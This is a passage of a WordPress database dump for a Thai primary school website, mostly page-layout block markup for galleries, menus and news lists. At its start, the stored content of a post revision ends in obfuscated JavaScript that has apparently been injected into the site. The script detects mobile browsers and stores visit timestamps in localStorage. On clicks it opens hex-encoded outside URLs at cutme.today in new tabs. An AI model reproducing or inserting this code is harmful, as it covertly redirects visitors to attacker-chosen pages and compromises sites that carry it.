_0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-01 11:41:10','2024-08-01 04:41:10','',355,'http://pakhaeng.ssk.in.th/?p=359',0,'revision','',0),
(360,1,'2024-08-01 11:47:51','2024-08-01 04:47:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 